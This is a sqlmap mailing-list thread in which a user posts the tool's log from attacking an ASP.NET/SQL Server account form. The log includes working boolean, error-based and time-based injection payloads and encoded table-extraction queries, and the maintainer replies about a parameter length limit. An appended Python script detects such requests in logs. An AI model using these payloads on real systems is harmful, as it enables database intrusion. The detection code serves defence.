Re: [sqlmap-users] problems extracting table names
From: Miroslav S. <mir...@gm...> - 2013-02-25 11:48:10
Hi.

Maybe the web server has a threshold value for a parameter value length. This looks like such a case.

Kind regards,
Miroslav Stampar

On 22.2.2013 02:23, "Brian Milliron" <Br...@ec...> wrote:

> SQLmap is able to extract db names, current user and backend info, but
> when I try to get tables I end up with junk data or nothing at all. I
> find this strange because SQLmap has identified multiple injection
> methods and I am on a fast local connection with the target server.
> This is the log file with examples of good/bad data.
>
> sqlmap identified the following injection points with a total of 118915
> HTTP(s) requests:
> ---
> Place: POST
> Parameter: accountNumber
>     Type: boolean-based blind
>     Title: Generic boolean-based blind - Parameter replace (original value)
>     Payload: accountNumber=(SELECT (CASE WHEN (4906=4906) THEN 1111111 ELSE 1/(SELECT 0) END))&meterNumber=1111111&zipCode=78451&email=te...@te...&register=Register
>
>     Type: error-based
>     Title: Microsoft SQL Server/Sybase error-based - Parameter replace
>     Payload: accountNumber=(CONVERT(INT,(CHAR(58)+CHAR(111)+CHAR(109)+CHAR(100)+CHAR(58)+(SELECT (CASE WHEN (3149=3149) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(100)+CHAR(111)+CHAR(103)+CHAR(58))))&meterNumber=1111111&zipCode=78451&email=te...@te...&register=Register
>
>     Type: AND/OR time-based blind
>     Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)
>     Payload: accountNumber=-9196 OR 8333=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)&meterNumber=1111111&zipCode=78451&email=te...@te...&register=Register
> ---
> web server operating system: Windows 2003
> web application technology: ASP.NET, Microsoft IIS 6.0
> back-end DBMS: Microsoft SQL Server 2008
> available databases [21]:
> [redacted]
> current user: [redacted]
> current database: [redacted]
> current user is DBA: False
>
> [6 tables]
> +------------------------------------------------------------------------+
> | dbo.[??4c0?4A00370?520?22??2d0040005a??00??2A??58??5f0?0d00000?3c??2 |
> | dbo.[\n\n]                                                             |
> | dbo.[\n\n]                                                             |
> | dbo.[\n\n]                                                             |
> | dbo.[\n\n]                                                             |
> +------------------------------------------------------------------------+
>
> When I use --no-cast and --hex flags I get no data at all, and when I
> don't use them I get junk data. When I look at the raw request/response,
> in every case I see sqlmap send a test request with no injection which
> generates a 200 response, then follows an attempt to read the number of
> tables which generates a 500 error with a number in the error message.
> Every follow-on request generates a 200 OK response, which means that
> neither boolean- nor error-based methods are working and it falls back to
> time-based, which then also fails. Of all the correct data gathered so
> far, all was through error messages. However, specifying --technique=E
> --parse-errors does not gain any additional info. Some selected
> examples from the logs related to this attempt follow:
>
> ./sqlmap.py -r /root/request --fresh-queries -o --hex --no-cast -D master --tables -t ~/sqlmap
>
> [WARNING] it was not possible to count the number of entries for the SQL query provided. sqlmap will assume that it returns only one entry
> [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' and/or switch '--hex'
> [CRITICAL] unable to retrieve the tables for any database
> [WARNING] HTTP error codes detected during run:
> 500 (Internal Server Error) - 18 times
>
> %28CONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28111%29%2BCHAR%28109%29%2BCHAR%28100%29%2BCHAR%2858%29%2B%28SELECT%20master.sys.fn_varbintohexstr%28CAST%28COUNT%28master..sysusers.name%2BCHAR%2846%29%2Bmaster..sysobjects.name%29%20AS%20VARBINARY%28MAX%29%29%29%20FROM%20master..sysobjects%20INNER%20JOIN%20master..sysusers%20ON%20master..sysobjects.uid%20%3D%20master..sysusers.uid%20WHERE%20master..sysobjects.xtype%20IN%20%28CHAR%28117%29%2CCHAR%28118%29%29%29%2BCHAR%2858%29%2BCHAR%28100%29%2BCHAR%28111%29%2BCHAR%28103%29%2BCHAR%2858%29%29%29%29
>
> HTTP response [#2] (500 Internal Server Error):
> [Macromedia][SQLServer JDBC Driver][SQLServer]Conversion failed when
> converting the nvarchar value ':omd:0x00000167:dog:' to data type int.
>
> %28CONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28111%29%2BCHAR%28109%29%2BCHAR%28100%29%2BCHAR%2858%29%2B%28SELECT%20TOP%201%20SUBSTRING%28%28master.sys.fn_varbintohexstr%28CAST%28master..sysusers.name%2BCHAR%2846%29%2Bmaster..sysobjects.name%20AS%20VARBINARY%28MAX%29%29%29%29%2C1%2C100%29%20FROM%20master..sysobjects%20INNER%20JOIN%20master..sysusers%20ON%20master..sysobjects.uid%20%3D%20master..sysusers.uid%20WHERE%20master..sysobjects.xtype%20IN%20%28CHAR%28117%29%2CCHAR%28118%29%29%20AND%20master.sys.fn_varbintohexstr%28CAST%28master..sysusers.name%2BCHAR%2846%29%2Bmaster..sysobjects.name%20AS%20VARBINARY%28MAX%29%29%29%20NOT%20IN%20%28SELECT%20TOP%200%20master.sys.fn_varbintohexstr%28CAST%28master..sysusers.name%2BCHAR%2846%29%2Bmaster..sysobjects.name%20AS%20VARBINARY%28MAX%29%29%29%20FROM%20master..sysobjects%20INNER%20JOIN%20master..sysusers%20ON%20master..sysobjects.uid%20%3D%20master..sysusers.uid%20WHERE%20master..sysobjects.xtype%20IN%20%28CHAR%28117%29%2CCHAR%28118%29%29%20ORDER%20BY%20master..sysusers.name%2BCHAR%2846%29%2Bmaster..sysobjects.name%29%20ORDER%20BY%20master..sysusers.name%2BCHAR%2846%29%2Bmaster..sysobjects.name%29%2BCHAR%2858%29%2BCHAR%28100%29%2BCHAR%28111%29%2BCHAR%28103%29%2BCHAR%2858%29%29%29%29
>
> HTTP response [#3] (200 OK):
>
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
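As an added example, not from the thread or from sqlmap itself: a small log triage that recognises the error-based exchange quoted above from the defender's side, on both the request (CONVERT(INT, ...) with CHAR()-built delimiters) and the response (the verbose SQL Server conversion error echoed to the client), and recovers what that one 500 response actually disclosed. The log entries are constructed stand-ins modelled on the quoted requests, with the parameter values shortened; the error text is as quoted.

```python
import re
from urllib.parse import unquote

# Constructed log entries modelled on the request/response pairs quoted in the
# thread. Entry 0 is the plain probe, entry 1 the 500 that leaked data, entry 2
# a later error-based request that only got a bland 200 back.
SAMPLE_LOG = [
    {"param": "1111111", "status": 200, "body": "<html>account form</html>"},
    {"param": ("%28CONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28111%29%2BCHAR%28109%29"
               "%2BCHAR%28100%29%2BCHAR%2858%29%2B%28SELECT%20master.sys.fn_varbintohexstr"
               "%28CAST%28COUNT%28master..sysobjects.name%29%20AS%20VARBINARY%28MAX%29%29%29%29"
               "%2BCHAR%2858%29%2BCHAR%28100%29%2BCHAR%28111%29%2BCHAR%28103%29%2BCHAR%2858%29%29%29%29"),
     "status": 500,
     "body": "[Macromedia][SQLServer JDBC Driver][SQLServer]Conversion failed when "
             "converting the nvarchar value ':omd:0x00000167:dog:' to data type int."},
    {"param": ("%28CONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28111%29%2BCHAR%28109%29"
               "%2BCHAR%28100%29%2BCHAR%2858%29%2B%28SELECT%20TOP%201%20master..sysobjects.name"
               "%20FROM%20master..sysobjects%20WHERE%20xtype%20IN%20%28CHAR%28117%29%2CCHAR%28118%29%29%29"
               "%2BCHAR%2858%29%2BCHAR%28100%29%2BCHAR%28111%29%2BCHAR%28103%29%2BCHAR%2858%29%29%29%29"),
     "status": 200, "body": "<html>account form</html>"},
]

# Request side: a forced integer cast around a subquery, or SQL Server's hex helper.
INJECTION_RE = re.compile(r"CONVERT\s*\(\s*INT\s*,|fn_varbintohexstr", re.I)
# Two or more adjacent CHAR(n) literals: the delimiters wrapped around the result.
MARKER_RUN_RE = re.compile(r"(?:CHAR\(\d+\)\+?){2,}", re.I)
# Response side: the DBMS conversion error returned verbatim to the client.
LEAK_RE = re.compile(r"Conversion failed when converting the \w+ value '([^']*)' to data type int")

def decode_markers(sql):
    """Spell out each run of CHAR(n)+CHAR(m)+... as the text it builds."""
    return ["".join(chr(int(n)) for n in re.findall(r"\d+", run)) for run in MARKER_RUN_RE.findall(sql)]

def analyse(entry):
    """Classify one request/response pair and, if the response leaked, recover the value."""
    value = unquote(entry["param"])
    finding = {"status": entry["status"], "length": len(value),
               "injection": bool(INJECTION_RE.search(value)), "leaked": None}
    m = LEAK_RE.search(entry["body"])
    if m:
        leaked, markers = m.group(1), decode_markers(value)
        # Strip the delimiters (':omd:' ... ':dog:' in the quoted log) if present.
        if len(markers) >= 2 and leaked.startswith(markers[0]) and leaked.endswith(markers[-1]):
            leaked = leaked[len(markers[0]):len(leaked) - len(markers[-1])]
        # fn_varbintohexstr output is a hex string; decode it to the integer it carries.
        finding["leaked"] = int(leaked, 16) if leaked.startswith("0x") else leaked
    return finding

if __name__ == "__main__":
    for f in map(analyse, SAMPLE_LOG):
        print(f)
```

Entry 2 illustrates the situation the thread describes: the request still carries the injection signature, so a request-side rule catches it even though the 200 response gave the tool nothing to parse.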